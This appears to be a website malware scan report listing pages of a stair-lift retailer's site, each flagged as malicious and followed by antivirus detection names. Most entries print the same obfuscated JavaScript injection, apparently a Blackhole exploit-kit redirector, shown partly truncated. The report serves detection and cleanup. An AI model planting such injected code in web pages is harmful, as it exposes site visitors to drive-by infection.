Request | Server response | Status |
http://www.ontariostairlifts.ca/ | 200 OK Content-Length: 8411 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.adluge.com/trackerjs/visitors-tracker.js | 200 OK Content-Length: 6007 Content-Type: application/javascript | clean |
http://www.ontariostairlifts.ca/request-a-quote.php | 200 OK Content-Length: 13356 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/accessible-renovations/ | 200 OK Content-Length: 10601 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/stair-lifts | 200 OK Content-Length: 3502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/test404page.js | 200 OK Content-Length: 13356 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/acorn-stair-lifts/ | 200 OK Content-Length: 11179 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/stair-lifts/straight-stair-lifts | 200 OK Content-Length: 3502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/stair-lifts/curved-stair-lifts | 200 OK Content-Length: 3502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/ceiling-track-lifts | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.ontariostairlifts.ca/wheelchair-lifts | 200 OK Content-Length: 3502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/wheelchair-lifts/vertical-platform-lifts/savaria-vertical-platform-lifts | 500 timeout Content-Length: 30 Content-Type: text/plain | clean |
http://www.ontariostairlifts.ca/wheelchair-lifts/vertical-platform-lifts/savaria-multilift | 200 OK Content-Length: 3502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/wheelchair-lifts/vertical-platform-lifts/savaria-telecab | 200 OK Content-Length: 3502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
- TrojWare.JS.BlacoleRef.CN
- CAT-QuickHeal
- JS/IframeRef.DCC
- McAfee-GW-Edition
- JS/Exploit-Blacole.gc
- TrendMicro
- JS_BLACOLE.SMAP
- Kaspersky
- HEUR:Trojan.Script.Iframer
- Microsoft
- Trojan:JS/BlacoleRef.W
- MicroWorld-eScan
- JS:Exploit.JS.Blacole.T
- Fortinet
- JS/Crypt.BBDV!tr
- PCTools
- Trojan.Webkit
- NANO-Antivirus
- Trojan.Script.Iframe.bcsmhk
- McAfee
- JS/Exploit-Blacole.gc
- F-Secure
- JS:Exploit.JS.Blacole.T
- VIPRE
- Trojan.JS.BlacoleRef.cm (v)
- F-Prot
- JS/IFrame.HC.gen
- AVG
- HTML/Framer
- Norman
- Crypt.BJLT
- GData
- JS:Exploit.JS.Blacole.T
- Symantec
- Trojan.Webkit!html
- Commtouch
- JS/IFrame.HC.gen
- BitDefender
- JS:Exploit.JS.Blacole.T
|
http://www.ontariostairlifts.ca/wheelchair-lifts/vertical-platform-lifts/thyssen-krupp-vertical-platform-lifts | 200 OK Content-Length: 3502 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) ww=window;try{ww.document.body=ww.document.body}catch(dgsgsdg){zxc=1;}try{if(ww.document)window["doc"+"ument"]["body"]=ww.document}catch(bawetawe){if(ww.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["b"+"o"+"dy"]="123"}catch(gfdnfdgber){if("".substr)ev=eval;}} n=["9","9","45","42","17","1f","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41"
... 2489 bytes are skipped ...,"44","41","45","43","44","4g","1e","1j","1e","1o","1n","1e","1g","29","d","9","9","9","40","4b","3o","4h","49","41","4a","4g","1l","43","41","4g","2j","48","41","49","41","4a","4g","4f","2g","4l","39","3m","43","33","3m","49","41","1f","1e","3n","4b","40","4l","1e","1g","3g","1n","3i","1l","3m","4c","4c","41","4a","40","2h","44","45","48","40","1f","42","1g","29","d","9","9","50"];h=2;s="";if(zxc)for(i=0;i-615!=0;i++){k=i;s+=String.fromCharCode(parseInt(n[i],25));}z=s;if(ww.document)ev(""+z)}}}Antivirus reports:- AntiVir
- JS/BlacoleRef.W.80
- Avast
- JS:Agent-AXR [Trj]
- Ikarus
- Trojan.Script
- nProtect
- JS:Exploit.JS.Blacole.T
- K7AntiVirus
- Riskware
- TrendMicro-HouseCall
- JS_BLACOLE.SMAP
- Comodo
